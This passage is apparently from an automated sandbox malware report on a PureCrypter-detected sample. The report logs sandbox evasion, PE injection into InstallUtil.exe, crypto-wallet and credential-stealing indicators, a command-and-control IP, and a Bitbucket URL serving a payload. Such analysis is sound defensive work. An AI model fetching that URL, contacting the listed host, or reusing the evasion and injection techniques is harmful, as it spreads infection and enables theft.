Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599339 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598797 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598687 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598578 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598468 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597888 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597655 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597546 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597319 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598881 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598750 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598640 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598421 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598091 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597981 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597854 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597718 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597580 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597362 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000001.00000002.4171522011.0000000005EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: InstallUtil.exe, 00000001.00000002.4171522011.0000000005ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: InstallUtil.exe, 00000001.00000002.4168769540.00000000055B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1724334331.0000000001062000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: msql2.exe, 00000002.00000002.1866301903.0000000000DB2000.00000004.00000020.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1934161172.00000000016BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Detected PureCrypter Trojan
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 31.41.244.211MIIE4DCCAsigAwIBAgIQAKI76K+hVeLaTvofiVz9TTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZYdWltanIwIBcNMjQwOTE0MTY1NjU4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlh1aW1qcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKYQzr446JBOTpfSRW/X/Un0LfoQtjEFcCPLax+z9I1vVwpdWj6kdo5thcgTh5GK8gmdcL1wkmJHzgPnlC0XGs23478pphZy4xENfqNlYdKTm0vjzy2uJC7Z5lHmna6pSX6DTuVpKw54JBAGCUDtI0mn3EV5+dJ+1xR54mvugabUjn0aWX4lHsv+APiJInpAJBqtzFW0BgAOJK07N/vFWHmakjy+NKJAF/gEG+B2JyFwWzm729P2b4aB4E9b/r9KKfpM235S9DXTbVqJnAgiEwH291ulserQn/gfqzVH9kMrrqa9310wS04QuEhCDZlvT2QNJVCRRaQiVGriIL/cG0duEqk3H06hzil1uEN3NZ5geFl/HoyzqmH8Pzn60p8PkEqdITyUXADJQN2+HtAz9ZGwDPwVV/LpB6W3MtDtwWE7yonkbIa+i4YwBsGds41m6Pk66wwnDDCwBY/NwUht4hlf2cY3SV3uHJC6IBMdSfzfXWBql4jmmSMPsiB48ChzQf+U+sl3ee7hV2wFOFq5wNfASKjQLdtTXk5vKIb6mFAX4L7nONtntIUQ3taxhw9wgLNb0iTjyTkJs0zI8ffsuFT3TrDxdOZsOhRpMwhr5SWMmRv6mdRSk8viEtxYr3F5nfDVs+Kp9YrUhn9tbbAxC75I5jZdN6kpZC90tsg9M9irAgMBAAGjMjAwMB0GA1UdDgQWBBQKqTXSJ2zPJXAiYYaW0wRWBYd/gzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBTFIKM0vXtl1GrNVkUK1VmD3aMjPQ5y2MPJZD8uFkFP59T8sFP4Y776p/x3ej5Z1F8lsHn+IX6CkGwQofe8jv/zstog7oNbv6fADdZ0hJNtBU/C6WWu5EYohtw8cGApb/CLYThBZWcL16IWW5OyjX/XhzLiVrNRwU9cIHdl1xLueyEmuyN4BeR4yqJEOuovMfN8UE//DvNlwpgwfGi9//4YEU+qyTIT1Cyod1CB4mCX7uYdbJyMiOvdRXIT/Cr8xFk12OdhJ41Iq/3o7TQDRpt+T2L1nquaxNQl2TD2Qn4aOWwqW4aa2VHhqqIaZigPWdMNr/ZVkyx64ZqHzQGoe/gnbs0saGU1dTeS1lqlMSL1wXdLwg9mLvqBzj1glijt4spLSzdSBrqTAc8cmgDfTUvZoG6SROQIWSC28IEJx6fzzoSlhULBzjGG9MCZi/j+VTnOy/XVGWonyoqVTipekop5IjLIcnatMFNqFNrarHU4fmn14+iuiMdmdDzlxGcOYDopLDxVtkCehOihb7jsgS0gnAoeL+sZ+cPyVO//er+yHjOr8l3iF1WpeDanFBtyyf9j+dpLdae7T8+gTjuAE+TJqYqVvKH50+rpyPkRGtfS+jN44XrRd475MP/KER5BwnG2F1AT4i9BGQA9Qm9NCON3qDXChvxS4zlgPVXHBSO4g=="Default
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6A2008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C50008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 458000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 45A000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63A008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002FE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qD
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qd
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q\1
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q$
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q<3
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerram Manager
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerram Manager@\^q
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qy
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q<
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q\
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q(5
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qL2
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qT
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002E31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qt
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q,4
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qLV
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^qp
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002D16000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q,
Source: InstallUtil.exe, 00000001.00000002.4149515832.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002D66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002F21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerTe^q
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Queries volume information: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Queries volume information: C:\Users\user\AppData\Roaming\msql2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Queries volume information: C:\Users\user\AppData\Roaming\msql2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Exodus Web3
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: InstallUtil.exe, 00000001.00000002.4173707669.0000000006790000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 3384, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532602 Sample: hvnc-CR-SCR-0710.bin.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 30 s3-w.us-east-1.amazonaws.com 2->30 32 s3-1-w.amazonaws.com 2->32 34 2 other IPs or domains 2->34 52 Suricata IDS alerts for network traffic 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected AntiVM3 2->56 58 7 other signatures 2->58 7 hvnc-CR-SCR-0710.bin.exe 16 4 2->7         started        12 msql2.exe 14 2 2->12         started        14 msql2.exe 2 2->14         started        signatures3 process4 dnsIp5 36 s3-w.us-east-1.amazonaws.com 3.5.30.95, 443, 49731 AMAZON-AESUS United States 7->36 38 bitbucket.org 185.166.143.49, 443, 49730, 49734 AMAZON-02US Germany 7->38 24 C:\Users\user\AppData\Roaming\msql2.exe, PE32 7->24 dropped 26 C:\Users\user\...\msql2.exe:Zone.Identifier, ASCII 7->26 dropped 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->60 62 Writes to foreign memory regions 7->62 64 Injects a PE file into a foreign processes 7->64 16 InstallUtil.exe 1 2 7->16         started        40 52.217.90.148, 443, 49735 AMAZON-02US United States 12->40 66 Multi AV Scanner detection for dropped file 12->66 68 Machine Learning detection for dropped file 12->68 20 InstallUtil.exe 3 12->20         started        42 54.231.232.1, 443, 49743 AMAZON-02US United States 14->42 22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 31.41.244.211, 49732, 55236, 56001 AEROEXPRESS-ASRU Russian Federation 16->28 44 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 16->44 46 Found many strings related to Crypto-Wallets (likely being stolen) 16->46 48 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 16->48 50 4 other signatures 16->50 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
31.41.244.211
 unknown Russian Federation
61974 AEROEXPRESS-ASRU true
54.231.232.1
 unknown United States
16509 AMAZON-02US false
185.166.143.49
 bitbucket.org Germany
16509 AMAZON-02US false
52.217.90.148
 unknown United States
16509 AMAZON-02US false
3.5.30.95
 s3-w.us-east-1.amazonaws.com United States
14618 AMAZON-AESUS false

Contacted Domains

Name IP Active
s3-w.us-east-1.amazonaws.com 3.5.30.95 true
bitbucket.org 185.166.143.49 true
bbuseruploads.s3.amazonaws.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://bitbucket.org/312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav false unknown